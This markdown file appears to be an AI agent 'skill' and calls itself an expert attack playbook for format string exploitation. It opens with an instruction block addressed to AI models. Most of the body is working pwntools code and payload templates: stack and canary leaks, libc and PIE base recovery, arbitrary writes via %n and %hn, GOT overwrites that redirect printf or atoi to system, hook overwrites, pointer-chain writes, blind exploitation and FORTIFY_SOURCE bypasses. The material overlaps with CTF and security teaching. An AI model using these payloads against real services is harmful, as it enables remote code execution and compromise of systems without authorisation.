---
name: format-string-exploitation
description: >-
  Format string exploitation playbook. Use when printf-family functions receive
  user-controlled format strings, enabling arbitrary stack reads (%p/%s), arbitrary
  memory writes (%n/%hn/%hhn), GOT/hook overwrites, and canary/libc/PIE leaks.
---

# SKILL: Format String Exploitation — Expert Attack Playbook

> **AI LOAD INSTRUCTION**: Expert format string techniques. Covers stack reading, arbitrary write via %n, GOT overwrite, `__malloc_hook` overwrite, pointer chain exploitation, blind format string, FORTIFY_SOURCE bypass, 64-bit null byte handling, and pwntools automation. Distilled from ctf-wiki fmtstr, CTF patterns, and real-world scenarios. Base models often miscalculate positional parameter offsets or forget that on 64-bit the target addresses must be placed after the format string.

## 0. RELATED ROUTING

- [stack-overflow-and-rop](../stack-overflow-and-rop/SKILL.md) — combine format string leak with stack overflow for full exploit
- [binary-protection-bypass](../binary-protection-bypass/SKILL.md) — format string is the primary canary/PIE/ASLR leak method
- [arbitrary-write-to-rce](../arbitrary-write-to-rce/SKILL.md) — convert format string write primitive to code execution targets
- [heap-exploitation](../heap-exploitation/SKILL.md) — heap address leak via format string for heap exploitation

---

## 1. VULNERABILITY IDENTIFICATION

### Vulnerable Pattern

```c
printf(user_input);              // VULNERABLE: user controls format string
fprintf(fp, user_input);         // VULNERABLE
sprintf(buf, user_input);        // VULNERABLE
snprintf(buf, sz, user_input);   // VULNERABLE
printf("%s", user_input);        // SAFE: format string is fixed
```

### Quick Test

```
Input: AAAA%p%p%p%p%p%p%p%p
If the output shows stack values (hex addresses), the format string bug is confirmed.
Look for 41414141 in the output to find your input offset
(on 64-bit the slot holding "AAAA%p%p" reads 0x7025702541414141).
```

---

## 2. READING MEMORY

### Stack Leak (%p)

| Format | Action | Use |
|---|---|---|
| `%p` | Print next stack value as pointer | Sequential stack dump |
| `%N$p` | Print N-th parameter as pointer | Direct positional access |
| `%N$lx` | Print N-th parameter as a raw `long` in hex (no `0x` prefix, `0` instead of `(nil)`) | Portable |
| `%N$s` | Dereference N-th parameter as string pointer | Read memory at pointer value (crashes if the value is not a mapped address) |

### Finding Your Input Offset

```python
# Send:   AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
# Output: AAAAAAAA.0x7ffd12340000.0x10.(nil).0x7f1234567890.0x1.0x4141414141414141...
#         the 6th value is 0x4141414141414141 → offset = 6 (example)

# Or automated (assumes the service loops; otherwise reconnect for each attempt):
for i in range(1, 30):
    io.sendline(f'AAAA%{i}$p'.encode())
    # recvline() returns bytes; on 64-bit the slot prints as 0x........41414141
    if b'41414141' in io.recvline():
        print(f'Offset = {i}')
        break
```

### Leaking Specific Values

| Target | Method | Stack Position |
|---|---|---|
| Canary | `%N$p` where N = canary offset from the format string | Typically input offset + buf_size/8 (+ a slot or two of padding); on x86-64 the value ends in `00` |
| Saved RBP | `%N$p` (slot just before the return address) | Leaks a stack address → stack base |
| Return address | `%N$p` | Leaks a .text address → PIE base = leak - (offset of that return site in the binary); the result should end in `000` |
| Libc address | `%N$p` where N points to the saved `__libc_start_main+XX` return on the stack (`__libc_start_call_main+XX` on glibc ≥ 2.34) | libc base = leak - offset |

### Reading Arbitrary Address (%s)

```
# 32-bit: place the address at the start of the format string
payload = p32(target_addr) + b'%N$s'   # N = input offset, where target_addr lands on the stack

# 64-bit: the address contains null bytes → place it AFTER the format specifiers
payload = f'%{offset+1}$s'.encode().ljust(8, b'A') + p64(target_addr)
# the specifier fills the first 8-byte slot (at `offset`), so the address sits at offset+1
```

---

## 3. WRITING MEMORY (%n)

### Write Specifiers

| Specifier | Bytes Written | Value Written |
|---|---|---|
| `%n` | 4 (`int`) | Characters printed so far |
| `%hn` | 2 (`short`) | Characters printed so far (mod 0x10000) |
| `%hhn` | 1 (`char`) | Characters printed so far (mod 0x100) |
| `%ln` | 8 (`long`) | Characters printed so far |

### Arbitrary Write Technique

**Goal**: Write value `V` to address `A`.
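Every variant below rests on the same arithmetic: each `%hn` stores the running character count mod 0x10000, so the `%c` padding before a write is the difference between the wanted 2-byte chunk and the count so far. A minimal sketch of that bookkeeping, using a hypothetical helper `hn_pads` that also sorts the chunks ascending so the total output stays small:

```python
def hn_pads(value, nbytes=6, already_printed=0):
    """Plan 2-byte %hn writes of `value` into `nbytes` bytes at some address A.

    Returns (byte_offset, pad) pairs in write order: print `pad` characters
    (emit no %c when pad == 0, since %0c still prints one character),
    then %hn into A + byte_offset.
    """
    # Split value into little-endian 2-byte chunks tagged with their byte offset
    chunks = [((value >> (16 * i)) & 0xffff, 2 * i) for i in range(nbytes // 2)]
    chunks.sort()  # ascending values, so each pad is a small forward step

    count = already_printed
    plan = []
    for chunk, byte_off in chunks:
        pad = (chunk - count) & 0xffff  # wraps around if count already passed chunk
        plan.append((byte_off, pad))
        count += pad
    return plan


# 48-bit libc pointer, 64-bit layout (nothing printed before the specifiers)
print(hn_pads(0x7f1234567890))
# → [(2, 13398), (0, 17466), (4, 1666)]
```

In the 32-bit layout the two addresses are printed before any specifier, so the same helper would be called with `nbytes=4, already_printed=8`.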
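**32-bit** (address on stack directly):

```python
from pwn import p32

# Write 2 bytes at a time using %hn.
# The target addresses go at the start of the payload, so they sit on the stack
# at `offset` and `offset + 1` (offset = input offset found earlier).
payload  = p32(target_addr)        # for low 2 bytes
payload += p32(target_addr + 2)    # for high 2 bytes

low  = value & 0xffff
high = (value >> 16) & 0xffff

def pad(n):
    # "%0c" still prints one character, so emit nothing for a zero-width pad
    return f'%{n}c' if n else ''

# The 8 address bytes are already printed before the first %hn
payload += f'{pad((low - 8) & 0xffff)}%{offset}$hn'.encode()
payload += f'{pad((high - low) & 0xffff)}%{offset + 1}$hn'.encode()
```

**64-bit** (address AFTER format string):

```python
from pwn import p64

# Addresses contain null bytes (0x00007fXXXXXXXXXX), which terminate the string,
# so the format specifiers go first and the addresses go last.
# Assumption: the specifier part fits in 32 bytes (4 stack slots),
# so the addresses land at offset + 4 and offset + 5.
low  = value & 0xffff
high = (value >> 16) & 0xffff

def pad(n):
    return f'%{n}c' if n else ''   # "%0c" would still print one character

# Step 1: format string portion (no null bytes)
fmt  = f'{pad(low)}%{offset + 4}$hn'
fmt += f'{pad((high - low) & 0xffff)}%{offset + 5}$hn'
fmt  = fmt.encode()
assert len(fmt) <= 32

# Step 2: pad to the 8-byte-aligned size assumed above
fmt = fmt.ljust(32, b'A')

# Step 3: append target addresses (null bytes are harmless after the specifiers)
fmt += p64(target_addr)
fmt += p64(target_addr + 2)
# This writes the low 32 bits of `value`; add a third %hn at target_addr + 4 for a 48-bit pointer.
```

### Byte-by-Byte Write with %hhn

Write one byte at a time for precision (6 writes cover a 48-bit address on 64-bit, assuming the top two bytes at the target are already zero, as they are in a GOT entry):

```python
from pwn import *

context.arch = 'amd64'   # fmtstr_payload packs values with the context word size

# pwntools splits `value` into single-byte %hhn writes itself:
payload = fmtstr_payload(offset, {target_addr: value}, numbwritten=0, write_size='byte')

# Explicit per-byte dict: the values must be bytes objects, not ints
# (an int would be packed to 8 bytes and the entries would overlap)
writes = {target_addr + i: bytes([(value >> (i * 8)) & 0xff]) for i in range(6)}
payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
```

---

## 4. PWNTOOLS fmtstr_payload()

```python
from pwn import *

context.arch = 'amd64'   # or 'i386'; selects pointer size and address packing

# Overwrite GOT entry with target address
# (libc.address must already be set to the leaked libc base)
payload = fmtstr_payload(
    offset,                                          # stack offset where input appears
    {elf.got['printf']: libc.symbols['system']},     # {addr: value}
    numbwritten=0,                                   # bytes already output before our input
    write_size='short'                               # 'byte', 'short', or 'int'
)

# For 64-bit, fmtstr_payload places the addresses after the format string
# automatically, as long as context.arch is set.
```

### FmtStr Class (Interactive Exploitation)

```python
from pwn import *

def send_payload(payload):
    # FmtStr calls this repeatedly while probing for the offset, so the
    # service must loop (or this function must open a fresh connection)
    io.sendline(payload)
    return io.recvline()

fmt = FmtStr(execute_fmt=send_payload)
# fmt.offset is auto-detected
fmt.write(elf.got['printf'], libc.symbols['system'])
fmt.execute_writes()
```

---

## 5. GOT OVERWRITE VIA FORMAT STRING

### Common Targets

| Overwrite | With | Trigger |
|---|---|---|
| `printf@GOT` | `system` | Next `printf(user_input)` → `system(user_input)`; send `/bin/sh` |
| `strlen@GOT` | `system` | If `strlen(user_input)` is called |
| `puts@GOT` | `system` | If `puts(user_input)` is called |
| `atoi@GOT` | `system` | If `atoi(user_input)` is called (send `sh` as the "number") |
| `__stack_chk_fail@GOT` | Controlled address (e.g. a `ret` gadget) | A smashed canary calls it instead of aborting, bypassing the canary check entirely |
| `exit@GOT` | `main` | Creates an infinite loop for a multi-shot exploit |

### Hook Targets (glibc < 2.34)

| Target | Overwrite With | Trigger |
|---|---|---|
| `__malloc_hook` | one_gadget address | Any `printf` with a large width (e.g. `%100000c`) calls `malloc` internally |
| `__free_hook` | `system` | Trigger `free("/bin/sh")` |

---

## 6. STACK POINTER CHAIN EXPLOITATION

When the format string is **not on the stack** (e.g., stored in a heap buffer referenced by a stack pointer), you cannot place target addresses where `%N$` can reach them. Instead, use existing pointer chains on the stack to achieve an arbitrary write.

### Two-Stage Write

```
Stack:  [offset A] → ptr_X  (stack address pointing to the slot at offset B)
        [offset B] → ptr_Y  (the value ptr_X points to)

Stage 1: %A$hn writes THROUGH ptr_X, overwriting the low 2 bytes of ptr_Y (slot B)
         → slot B now holds target_addr
Stage 2: %B$hn writes through the modified slot B → writes to target_addr
```

Run the two stages in separate `printf` calls: once glibc sees a positional argument it fetches all arguments up front, so a `%B$hn` in the same call would still use the old value of slot B. This requires finding **existing pointer chains** on the stack (e.g., saved frame pointers forming a chain: rbp → prev_rbp → prev_prev_rbp).

### Finding Pointer Chains

```python
# Leak the stack with %p and look for:
#   1. A stack address at offset N that points to another stack slot B
#   2. The offset M of slot B itself
# %N$hn writes through the pointer at N, changing the value stored in B
# (e.g., redirecting it to target_addr)
# In a later printf call, %M$hn writes through B to target_addr
```

---

## 7. BLIND FORMAT STRING

Remote service, no binary, no source — exploit format string blind.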
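Blind work starts by sorting leaked values by their high bytes. A rough classifier for `%p` tokens is sketched below; the helper name `classify_leak` is hypothetical, and the address ranges in its comments are heuristics for x86-64 Linux with ASLR, not guarantees:

```python
def classify_leak(token):
    """Guess what a single %p token from an x86-64 Linux leak points to (heuristic)."""
    if token == '(nil)':
        return 'null'
    v = int(token, 16)
    if v >> 40 == 0x7f and v >= 0x7ff000000000:
        return 'stack'         # assumption: stack sits just below 0x7fffffffffff
    if v >> 40 == 0x7f:
        return 'libc/mmap'     # assumption: shared libraries and mmap regions
    if v >> 40 in (0x55, 0x56):
        return 'pie'           # assumption: PIE binary or the brk heap after it
    if 0x400000 <= v < 0x10000000:
        return 'non-pie'       # assumption: non-PIE .text/.data/heap near 0x400000
    if v & 0xff == 0 and v > 0xffffffffffff:
        return 'canary?'       # random 64-bit value with a zero low byte
    return 'data'


dump = '0x7ffd12340000.0x10.(nil).0x7f1234567890.0x55d0c0ffe123'
for i, tok in enumerate(dump.split('.'), start=1):
    print(i, tok, classify_leak(tok))
```

The checks run from most to least specific, so a value that matches none of the pointer ranges falls through to `data`.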
### Methodology

| Step | Action | Purpose |
|---|---|---|
| 1 | Send `%p` × 50 | Dump stack, identify address patterns |
| 2 | Identify offsets | Find libc addrs (0x7f...), stack addrs (0x7ffc... to 0x7fff...), code addrs (0x55.../0x56... with PIE, 0x40.... without) |
| 3 | Find input offset | Send `AAAA%N$p` for N=1..50, look for 41414141 |
| 4 | Identify binary base | Code addresses reveal PIE base (or fixed base if no PIE) |
| 5 | Leak GOT entries | With the binary base known, place a GOT address in the payload and read it via `%N$s` |
| 6 | Calculate libc base | Leaked GOT value - libc symbol offset |
| 7 | Overwrite GOT | `%n`/`%hn` to rewrite a GOT entry with the address of `system` |

---

## 8. FORTIFY_SOURCE BYPASS

With `-D_FORTIFY_SOURCE=2` (and optimization enabled), gcc replaces `printf` with `__printf_chk`, which adds two runtime checks:

- `%n` of any size aborts with `*** %n in writable segment detected ***` when the format string lives in writable memory, which is always true for user input.
- A positional argument `%N$` aborts with `*** invalid %N$ use detected ***` unless every argument 1..N-1 is also referenced.

Leaks with sequential `%p` still work; writes through the format string itself are blocked.

### Bypass Techniques

| Method | Detail |
|---|---|
| Leak only, write elsewhere | Sequential `%p` still leaks canary/PIE/libc; feed those leaks into another bug |
| Stack-based exploit | Use the leaked canary and addresses for a stack overflow / ROP chain |
| Heap bug instead | FORTIFY doesn't protect the heap; combine the leaks with a heap bug |
| Return-to-printf | ROP to call an unfortified `printf` (if available in binary or libc), where `%n` works again |

---

## 9. 64-BIT CONSIDERATIONS

| Challenge | Solution |
|---|---|
| Addresses contain `\x00` (a null byte terminates the format string) | Place addresses AFTER the format specifiers, padded to 8-byte alignment |
| Address width: 6 significant bytes | Write 3 × `%hn` (2 bytes each) or 6 × `%hhn` |
| Larger stack offset range | For `printf`, `%1$` to `%5$` are the register arguments rsi, rdx, rcx, r8, r9 (rdi holds the format), so stack input starts at offset 6 or later |
| 48-bit address space | Only the bottom 48 bits of a 64-bit pointer are used; the top 2 bytes of user-space pointers are zero |

### Layout Template (64-bit)

```
[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...
 ← no null bytes here →                            ← null bytes OK (after fmt) →
```

---

## 10. DECISION TREE

```
Format string vulnerability confirmed (printf(user_input))
├── FORTIFY_SOURCE enabled? (__printf_chk)
│   ├── YES → %n blocked for writable format strings, no gaps allowed in %N$
│   │   ├── Leaks still work → sequential %p for canary/PIE/libc
│   │   └── Combine with another primitive (heap, stack overflow/ROP)
│   └── NO → full positional %n available
├── What do you need first?
│   ├── Leak canary → %N$p at canary stack offset
│   ├── Leak PIE base → %N$p at return address offset → base = leak - known_offset
│   ├── Leak libc base → %N$p at __libc_start_main return on stack → base = leak - known_offset
│   ├── Leak heap base → %N$p at heap pointer on stack
│   └── Leak specific address → %N$s with target address on stack
├── Architecture?
│   ├── 32-bit → addresses at start of format string
│   └── 64-bit → addresses after format string (null byte issue)
├── Write target?
│   ├── Partial RELRO → GOT overwrite (printf→system, atoi→system)
│   ├── Full RELRO → __malloc_hook or __free_hook (pre-2.34)
│   ├── Full RELRO + glibc ≥ 2.34 → target _IO_FILE, exit_funcs, TLS_dtor_list
│   └── Stack return address → direct overwrite (requires a stack address leak)
├── Single-shot or multi-shot?
│   ├── Loop (multi-shot) → overwrite GOT entry incrementally, use pointer chains
│   └── One-shot → fmtstr_payload() with all writes in a single payload
└── Input not on stack? (heap buffer)
    └── Use stack pointer chains for indirect writes
```
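Each leak branch of the tree ends in the same arithmetic, base = leak - known_offset, and a correct module base is page-aligned. A small sanity check for that step is sketched below; the helper `base_from_leak` is hypothetical, and `known_offset` must come from your own copy of the binary or the matching libc:

```python
def base_from_leak(leak, known_offset, page=0x1000):
    """Return module base = leak - known_offset, checking page alignment.

    A misaligned result usually means the wrong stack slot was leaked or the
    offset came from a different binary/libc build.
    """
    base = leak - known_offset
    if base % page:
        raise ValueError(f'base {base:#x} is not page-aligned; check the offset')
    return base


# Hypothetical numbers: libc mapped at 0x7f1234400000, return site at +0x29d90
libc_base = base_from_leak(0x7f1234429d90, 0x29d90)
print(hex(libc_base))  # → 0x7f1234400000
```

The same check applies to a PIE base computed from a leaked return address.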